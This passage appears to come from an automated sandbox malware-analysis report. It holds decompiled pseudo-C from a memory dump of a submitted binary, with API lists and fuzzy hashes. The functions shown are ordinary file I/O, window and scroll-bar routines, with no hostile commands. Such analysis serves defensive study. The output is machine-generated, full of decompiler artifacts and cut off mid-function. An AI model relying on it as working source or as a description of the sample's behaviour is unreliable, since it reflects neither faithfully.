					_t85 = _t83 | 0x00000004;
					goto L16;
				}
				_t102 = GetLastError();
				_t125 = 5;
				if(_t102 != _t125) {
					__eflags = _t102 - 0x6d;
					if(_t102 == 0x6d) {
						goto L42;
					}
					_t103 = E00406F05(_t102);
					L10:
					return _t103 | 0xffffffff;
				}
				 *((intOrPtr*)(E00406F78())) = 9;
				_t103 = E00406F81();
				 *_t103 = _t125;
				goto L10;
			}

0x0040fd4a
0x0040fd53
0x0040fd58
0x0040fd5a
0x0040ff16
0x0040ff16
0x00000000
0x0040ff16
0x0040fd60
0x0040fd68
0x0040fd75
0x0040fd7c
0x0040fd7f
0x0040fd81
0x0040fd87
0x00000000
0x00000000
0x0040fd90
0x0040fd92
0x0040fd97
0x0040fd99
0x0040fd9c
0x0040fda0
0x0040fda3
0x0040fdaa
0x0040fdaa
0x0040fd97
0x0040fdc6
0x0040fe01
0x0040fe03
0x0040fe06
0x0040fe09
0x0040fe09
0x0040fe0d
0x0040fe11
0x0040fe13
0x0040ff11
0x00000000
0x0040ff11
0x0040fe19
0x0040fe1b
0x0040fe26
0x0040fe26
0x0040fe26
0x0040fe28
0x0040fe28
0x0040fe2a
0x0040fe30
0x0040fe33
0x0040fe35
0x0040fe37
0x0040fe3a
0x0040ff0b
0x0040ff0b
0x0040ff0b
0x0040ff0e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040fe40
0x0040fe40
0x0040fe43
0x0040fe45
0x0040fe47
0x00000000
0x00000000
0x0040fe4d
0x0040fe4f
0x0040fe5d
0x0040fe60
0x0040fe80
0x0040fe8e
0x0040fe94
0x0040fe96
0x0040fea2
0x0040fea2
0x0040fea6
0x0040fee9
0x0040fee9
0x0040feec
0x0040feec
0x0040feec
0x0040feed
0x0040feed
0x0040fef0
0x0040fef3
0x00000000
0x00000000
0x00000000
0x0040fef9
0x0040fea8
0x0040feaa
0x0040feaf
0x0040fec4
0x0040fec7
0x0040fed4
0x0040fedb
0x0040fee0
0x0040fee3
0x0040fee7
0x00000000
0x00000000
0x00000000
0x0040fee7
0x0040fec9
0x0040fecd
0x00000000
0x00000000
0x0040fecf
0x0040fecf
0x00000000
0x0040fecf
0x0040feb1
0x0040feb4
0x0040feb6
0x00000000
0x00000000
0x0040feb8
0x0040febd
0x0040febe
0x00000000
0x0040febe
0x0040fe98
0x0040fe9e
0x0040fea0
0x00000000
0x00000000
0x00000000
0x0040fea0
0x0040fe65
0x0040fe66
0x0040fe69
0x0040fe71
0x0040fe74
0x0040fe75
0x00000000
0x0040fe75
0x0040fe6b
0x00000000
0x0040fe6b
0x0040fe51
0x0040fe53
0x0040fe54
0x00000000
0x0040fe54
0x0040fefd
0x0040ff01
0x0040ff03
0x0040ff05
0x0040ff07
0x0040ff07
0x0040ff09
0x0040ff09
0x00000000
0x0040ff05
0x0040fe1d
0x0040fe20
0x00000000
0x00000000
0x0040fe22
0x00000000
0x0040fe22
0x0040fdc8
0x0040fdd0
0x0040fdd3
0x0040fde9
0x0040fdec
0x00000000
0x00000000
0x0040fdf3
0x0040fdf9
0x00000000
0x0040fdf9
0x0040fdda
0x0040fde0
0x0040fde5
0x00000000

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?), ref: 0040FDBE
GetLastError.KERNEL32(?,?), ref: 0040FDC8
ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?), ref: 0040FE8E
GetLastError.KERNEL32(?,?), ref: 0040FE98

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 23115844c508a177bbe59758e9f8f5cb7ac59ad074daaa557504e197aa77565a
Instruction ID: d01b3c0b8dd5da0b8901ede80a7d7d1cd1fd8d123d1325fb95f4599fb7a38ff2
Opcode Fuzzy Hash: 23115844c508a177bbe59758e9f8f5cb7ac59ad074daaa557504e197aa77565a
Instruction Fuzzy Hash: 7051C7306043859FDF31CF58C88479A7BB0EF12304F5445BBE851AB6E2D378994ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCEC, Relevance: 6.1, APIs: 4, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041FCEC(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t79;
				int _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t106;
				int _t120;
				void* _t128;
				void* _t132;
				intOrPtr _t138;
				void* _t140;
				void* _t143;

				_t140 = __edi;
				_t128 = __ecx;
				_t79 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t132 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t138 =  *((intOrPtr*)(__ecx + 0x8c));
				_t143 = 2;
				if(_t138 == 0xa) {
					L7:
					 *((intOrPtr*)(_t128 + 0x28)) =  *((intOrPtr*)(_t128 + 0x28)) + _t79;
					L9:
					_t81 =  *((intOrPtr*)(_t128 + 0x30)) -  *((intOrPtr*)(_t128 + 0x28));
					__eflags = _t81;
					L10:
					if(_t81 < 0) {
						_t81 = 0;
					}
					_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x68)))) + 0xbc))( &(_v28.right), _t81, _t143, _t140);
					_v12 =  *_t83;
					_v8 =  *((intOrPtr*)(_t83 + 4));
					GetWindowRect(GetDesktopWindow(),  &_v60);
					asm("movsd");
					asm("movsd");
					_t87 =  *((intOrPtr*)(_t128 + 0x8c));
					asm("movsd");
					asm("movsd");
					if(_t87 == 0xa || _t87 == 0xc) {
						_v44.left =  *((intOrPtr*)(_t128 + 0x58)) -  *((intOrPtr*)(_t128 + 0x60)) - _v12 + _v44.right;
						_v44.top =  *((intOrPtr*)(_t128 + 0x5c)) -  *((intOrPtr*)(_t128 + 0x64)) - _v8 + _v44.bottom;
						__eflags = IntersectRect( &_v28,  &_v60,  &_v44);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t128 + 0x38)) =  *((intOrPtr*)(_t128 + 0x40)) - _v12;
							_t106 =  *((intOrPtr*)(_t128 + 0x44)) - _v8;
							__eflags = _t106;
							 *((intOrPtr*)(_t128 + 0x3c)) = _t106;
							 *(_t128 + 0x48) = _v44.left;
							 *((intOrPtr*)(_t128 + 0x4c)) = _v44.top;
						}
					} else {
						_v44.right =  *((intOrPtr*)(_t128 + 0x60)) -  *((intOrPtr*)(_t128 + 0x58)) + _v44.left + _v12;
						_v44.bottom =  *((intOrPtr*)(_t128 + 0x64)) -  *((intOrPtr*)(_t128 + 0x5c)) + _v44.top + _v8;
						_t120 = IntersectRect( &_v28,  &_v60,  &_v44);
						_t152 = _t120;
						if(_t120 != 0) {
							 *((intOrPtr*)(_t128 + 0x40)) =  *((intOrPtr*)(_t128 + 0x38)) + _v12;
							 *((intOrPtr*)(_t128 + 0x44)) =  *((intOrPtr*)(_t128 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t128 + 0x50)) = _v44.right;
							 *((intOrPtr*)(_t128 + 0x54)) = _v44.bottom;
						}
					}
					 *((intOrPtr*)(_t128 + 4)) = _a4;
					 *((intOrPtr*)(_t128 + 8)) = _a8;
					return E0042007A(_t128, _t152, 0);
				}
				if(_t138 == 0xb) {
					__eflags = _t138 - 0xa;
					if(_t138 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t79;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t143 = 0x22;
					if(_t138 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t132;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t132;
					}
					_t81 =  *((intOrPtr*)(_t128 + 0x34)) -  *((intOrPtr*)(_t128 + 0x2c));
					goto L10;
				}
			}

0x0041fcec
0x0041fcf6
0x0041fd01
0x0041fd06
0x0041fd08
0x0041fd11
0x0041fd12
0x0041fd36
0x0041fd36
0x0041fd3e
0x0041fd41
0x0041fd41
0x0041fd44
0x0041fd46
0x0041fd48
0x0041fd48
0x0041fd56
0x0041fd5e
0x0041fd64
0x0041fd72
0x0041fd7e
0x0041fd7f
0x0041fd80
0x0041fd86
0x0041fd87
0x0041fd8c
0x0041fdf3
0x0041fe02
0x0041fe17
0x0041fe19
0x0041fe21
0x0041fe27
0x0041fe27
0x0041fe2a
0x0041fe30
0x0041fe36
0x0041fe36
0x0041fd93
0x0041fd9f
0x0041fdae
0x0041fdbd
0x0041fdc3
0x0041fdc5
0x0041fdcd
0x0041fdd6
0x0041fddc
0x0041fde2
0x0041fde2
0x0041fdc5
0x0041fe3e
0x0041fe46
0x0041fe51
0x0041fe51
0x0041fd17
0x0041fd31
0x0041fd34
0x0041fd3b
0x0041fd3b
0x0041fd3b
0x00000000
0x0041fd3b
0x00000000
0x0041fd19
0x0041fd1e
0x0041fd1f
0x0041fd26
0x0041fd26
0x0041fd26
0x0041fd21
0x0041fd21
0x0041fd21
0x0041fd2c
0x00000000
0x0041fd2c

APIs

GetDesktopWindow.USER32 ref: 0041FD67
GetWindowRect.USER32 ref: 0041FD72
IntersectRect.USER32 ref: 0041FDBD
IntersectRect.USER32 ref: 0041FE11

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$IntersectWindow$Desktop
String ID:
API String ID: 123605412-0
Opcode ID: 015e43c128581ee0b130330a2085ed8f419fa95b38046ca9c52191cf96206b73
Instruction ID: 7ef3134b71351d20188b2f6e6573302e8d5814b45845c27d755b710e50fb3d9e
Opcode Fuzzy Hash: 015e43c128581ee0b130330a2085ed8f419fa95b38046ca9c52191cf96206b73
Instruction Fuzzy Hash: 43517272A00209DFCF54DFA8D5C4ADEBBF5BF08314B1441A6E905EB20AE734E986CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF6B, Relevance: 6.1, APIs: 4, Instructions: 135
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AF6B(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x43b520 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E0040AE93(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E00406F78())) = 0x1c;
								_t73 = E00406F81();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E00406F05(_a4);
						} else {
							 *((intOrPtr*)(E00406F78())) = 9;
							_t73 = E00406F81();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}

0x0040af77
0x0040af7c
0x0040af7f
0x0040af82
0x0040af91
0x0040afa3
0x0040afa6
0x0040afab
0x0040afb3
0x0040afb8
0x0040afbd
0x0040afbf
0x0040afc3
0x0040b097
0x0040b09d
0x0040b09f
0x0040b0b2
0x0040b0a1
0x0040b0a4
0x0040b0a7
0x0040b0a7
0x0040b053
0x0040b053
0x0040b056
0x0040b058
0x0040b0ee
0x0040b0ee
0x00000000
0x0040b0ee
0x0040b05e
0x0040b061
0x0040b0c5
0x0040b0c5
0x0040b0c7
0x0040b0cc
0x0040b0da
0x0040b0df
0x0040b0e5
0x0040b0ea
0x0040b0c0
0x00000000
0x0040b0c0
0x0040b0d1
0x0040b0d4
0x00000000
0x00000000
0x00000000
0x0040b0d4
0x0040b065
0x0040b066
0x0040b069
0x0040b0ba
0x0040b06b
0x0040b070
0x0040b076
0x0040b07b
0x0040b07b
0x00000000
0x0040b069
0x0040afcc
0x0040afcf
0x0040afd2
0x0040afd5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040afdb
0x0040afdb
0x0040afdb
0x0040afe1
0x0040afe7
0x0040afea
0x00000000
0x00000000
0x0040afef
0x0040aff2
0x0040aff4
0x0040aff7
0x0040aff9
0x0040affc
0x0040afff
0x0040afff
0x0040afff
0x0040b000
0x0040b002
0x0040b00d
0x0040b00d
0x0040b01d
0x0040b032
0x0040b038
0x0040b03a
0x0040b085
0x00000000
0x0040b085
0x0040b03c
0x0040b03f
0x0040b042
0x0040b044
0x00000000
0x00000000
0x0040b04c
0x0040b04c
0x0040b051
0x0040b051
0x00000000
0x0040b051
0x0040af84
0x00000000

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000001,?,?), ref: 0040B032

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: fd880a33552e59a877ac07e62e70fb8bcc1509261c86d9df016157276de9b604
Instruction ID: 01ac4f6acfc5913959f88f192ecd96d6d2ffcc37b6012a8bce105fbf1c838ef3
Opcode Fuzzy Hash: fd880a33552e59a877ac07e62e70fb8bcc1509261c86d9df016157276de9b604
Instruction Fuzzy Hash: 21519371A00209EFCB11DF68C844B9E7BB4EF41344F1581BAE825AB291D734DA51CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00427B02, Relevance: 6.1, APIs: 4, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00427B02(void* __ecx, int _a4, int _a8, int _a12) {
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t66;
				int _t68;
				void* _t69;
				intOrPtr _t75;
				intOrPtr* _t78;
				signed short _t94;
				intOrPtr* _t107;
				signed int _t110;
				int* _t111;
				intOrPtr _t113;
				void* _t114;

				_t114 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xec)) != 0) {
					_t89 = _a4;
					_t60 =  *((intOrPtr*)(__ecx + 0x90));
					 *(__ecx + 0xf8) = 1;
					_t110 = _a4 + _a4 * 4 << 3;
					 *((intOrPtr*)(_t60 + 0x20)) =  *((intOrPtr*)(_t60 + _t110 + 0x20));
					 *((intOrPtr*)(_t60 + 0x24)) =  *((intOrPtr*)(_t60 + _t110 + 0x24));
					_t61 =  *((intOrPtr*)(__ecx + 0x90));
					 *((intOrPtr*)(_t61 + 0x10)) =  *((intOrPtr*)(_t61 + _t110 + 0x10));
					 *((intOrPtr*)(_t61 + 0x14)) =  *((intOrPtr*)(_t61 + _t110 + 0x14));
					E00427C71(__ecx,  *((intOrPtr*)(__ecx + 0xf4)) + _t89, 0);
					E0042722C(__ecx,  *((intOrPtr*)(_t61 + _t110 + 0x14)), __eflags, 0);
					_t66 =  *((intOrPtr*)(_t114 + 0x90));
					_t111 = _t110 + _t66 + 0x18;
					_a8 = MulDiv(_a8,  *_t111,  *(_t110 + _t66 + 0x1c));
					_t68 = MulDiv(_a12,  *_t111, _t111[1]);
					_t107 =  *((intOrPtr*)(_t114 + 0x90));
					_a8 = _a8 +  *_t107;
					_t69 = _t68 +  *((intOrPtr*)(_t107 + 4));
					__eflags = _t69;
					_push(_t69);
					_push(_a8);
					return E0041B0C1(_t114,  *((intOrPtr*)(_t107 + 4)));
				}
				 *(__ecx + 0xf8) =  *(__ecx + 0xe8);
				ShowScrollBar( *(__ecx + 0x1c), 0, 0);
				_t75 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x114)))) + 0x5c));
				_t94 =  *((intOrPtr*)(_t75 + 0x1e));
				if(_t94 >= 0x8000) {
					L3:
					_a4 = 0;
					L4:
					ShowScrollBar( *(_t114 + 0x1c), 1, _a4);
					if(_a4 != 0) {
						_t78 =  *((intOrPtr*)(_t114 + 0x114));
						_v28 = 3;
						_t113 = 1;
						_v24 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1c) & 0x0000ffff;
						_v20 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1e) & 0x0000ffff;
						_v16 = _t113;
						if(E00415006(_t114, _t113,  &_v32, 0) == 0) {
							E00414F60(_t114, _t113, _v24, _v20, 0);
						}
					}
					return E00427C71(_t114,  *((intOrPtr*)(_t114 + 0xf4)), 1);
				}
				_a4 = 1;
				if((_t94 & 0x0000ffff) - ( *(_t75 + 0x1c) & 0x0000ffff) <= 0x7fff) {
					goto L4;
				}
				goto L3;
			}

0x00427b0a
0x00427b15
0x00427bd3
0x00427bd6
0x00427bdc
0x00427bea
0x00427bf1
0x00427bf8
0x00427bfb
0x00427c05
0x00427c0c
0x00427c1a
0x00427c22
0x00427c27
0x00427c37
0x00427c45
0x00427c4d
0x00427c4f
0x00427c57
0x00427c5f
0x00427c5f
0x00427c61
0x00427c62
0x00000000
0x00427c65
0x00427b2c
0x00427b32
0x00427b3c
0x00427b3f
0x00427b48
0x00427b62
0x00427b62
0x00427b65
0x00427b6d
0x00427b72
0x00427b74
0x00427b7a
0x00427b85
0x00427b8e
0x00427b9c
0x00427ba4
0x00427bae
0x00427bba
0x00427bba
0x00427bae
0x00000000
0x00427bc9
0x00427b53
0x00427b60
0x00000000
0x00000000
0x00000000

APIs

ShowScrollBar.USER32(?,00000000,00000000), ref: 00427B32
ShowScrollBar.USER32(?,00000001,?), ref: 00427B6D
MulDiv.KERNEL32(?,?,?), ref: 00427C40
MulDiv.KERNEL32(?,?,?), ref: 00427C4D

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ScrollShow
String ID:
API String ID: 3611344627-0
Opcode ID: 2acf91cb5d467283592410175f9d93aeb9e8677cf2499e65e3e46aab8ffa07e5
Instruction ID: e36dfcb719c56f5c0c47cfadceb7236ddc00b612851f65575ceccfe99fb50706
Opcode Fuzzy Hash: 2acf91cb5d467283592410175f9d93aeb9e8677cf2499e65e3e46aab8ffa07e5
Instruction Fuzzy Hash: A1417C70600615AFCB14DF29D880EAABBF5FF88308F10856EF9199B361D774E851DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0042007A, Relevance: 6.1, APIs: 4, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0042007A(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __ebp;
				intOrPtr _t56;
				signed char _t60;
				signed char _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				intOrPtr _t84;
				intOrPtr _t95;

				_t56 = 1;
				_t76 = __ecx;
				_v24 = _t56;
				_v20 = _t56;
				_push(GetStockObject(0));
				_t84 = E0041A5FC();
				_v16 = _t84;
				_v8 = E00423BE7(__eflags);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t84;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00000050;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L7:
							__eflags = _t65 & 0x00000050;
							if(__eflags == 0) {
								L10:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L10;
								} else {
									goto L9;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L7;
							}
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v12 = _v8;
					} else {
						goto L2;
					}
				} else {
					L2:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				_t95 =  *0x439c3c; // 0x1
				if(_t95 != 0 && ( *(_t76 + 0x75) & 0x000000f0) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t97 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E00423C5A( *((intOrPtr*)(_t76 + 0x84)), _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}

0x00420085
0x00420086
0x0042008a
0x0042008d
0x00420096
0x0042009c
0x0042009e
0x004200a6
0x004200a9
0x004200ac
0x004200b6
0x004200c4
0x004200c7
0x004200db
0x004200e1
0x004200e4
0x004200e7
0x004200e9
0x004200f1
0x004200f1
0x004200f4
0x00420101
0x004200f6
0x004200f6
0x004200fa
0x00000000
0x00000000
0x00000000
0x00000000
0x004200fa
0x004200eb
0x004200eb
0x004200ef
0x00000000
0x00000000
0x004200ef
0x0042010a
0x0042010b
0x0042010c
0x0042010d
0x0042010e
0x004200c9
0x00000000
0x004200c9
0x004200b8
0x004200bb
0x004200be
0x004200bf
0x004200c0
0x004200c1
0x004200c1
0x00420116
0x00420118
0x0042011b
0x0042011b
0x0042011e
0x00420124
0x00420134
0x00420134
0x0042013a
0x0042013d
0x00420140
0x00420142
0x00420142
0x00420163
0x0042016e
0x00420172
0x00420178
0x00420179
0x0042017a
0x00420182
0x00420183
0x00420187
0x0042018d

APIs

GetStockObject.GDI32(00000000), ref: 00420090

Part of subcall function 00423BE7: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004200A6), ref: 00423C26
Part of subcall function 00423BE7: CreatePatternBrush.GDI32(00000000), ref: 00423C33
Part of subcall function 00423BE7: DeleteObject.GDI32(00000000), ref: 00423C3F

GetSystemMetrics.USER32 ref: 004200D6
GetSystemMetrics.USER32 ref: 004200DE
InflateRect.USER32(?,000000FF,000000FF), ref: 00420134

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CreateMetricsObjectSystem$BitmapBrushDeleteInflatePatternRectStock
String ID:
API String ID: 419749085-0
Opcode ID: f04683a99d2cf70874936f412b73c80b9557d256e680e15b78c8faeb2f1dfe54
Instruction ID: e0589e39635e5819ef82d448fd258ad5fc30fad598c9d44a8e29054fd3acad8a
Opcode Fuzzy Hash: f04683a99d2cf70874936f412b73c80b9557d256e680e15b78c8faeb2f1dfe54
Instruction Fuzzy Hash: 1B413D71E006289BCF11CFA4D984BAEBBF5AF09310F514166ED10BB296D3B59E41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB45, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040EB45(short* _a4, char* _a8, intOrPtr _a12, char* _a16, intOrPtr* _a20) {
				intOrPtr* _t29;
				int _t30;
				void* _t32;
				signed int _t33;
				int _t35;
				signed short* _t38;
				short* _t39;
				intOrPtr _t41;
				intOrPtr _t42;
				int _t46;
				signed char _t50;
				char* _t53;
				char* _t54;

				_t53 = _a8;
				if(_t53 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					_t50 =  *_t53;
					if(_t50 != 0) {
						_t29 = _a20;
						if(_t29 != 0) {
							_t42 =  *_t29;
							_t30 =  *(_t29 + 4);
						} else {
							_t42 =  *0x439eec; // 0x0
							_t30 =  *0x439efc; // 0x0
						}
						if(_t42 != 0) {
							_t54 = _a16;
							if( *_t54 == 0) {
								_t41 =  *0x437100; // 0x43710a
								if(( *(_t41 + 1 + (_t50 & 0x000000ff) * 2) & 0x00000080) == 0) {
									if(MultiByteToWideChar(_t30, 9, _t53, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
										goto L13;
									}
									L21:
									_t33 = E00406F78();
									 *_t33 = 0x2a;
									return _t33 | 0xffffffff;
								}
								_t46 =  *0x43730c; // 0x1
								if(_a12 >= _t46) {
									if(_t46 <= 1 || MultiByteToWideChar(_t30, 9, _t53, _t46, _a4, 0 | _a4 != 0x00000000) == 0) {
										if(_t53[1] != 0) {
											goto L19;
										}
										 *_t54 =  *_t54 & 0x00000000;
										goto L21;
									} else {
										L19:
										_t35 =  *0x43730c; // 0x1
										return _t35;
									}
								}
								 *_t54 = _t50;
								_push(0xfffffffe);
								goto L14;
							}
							_t54[1] = _t50;
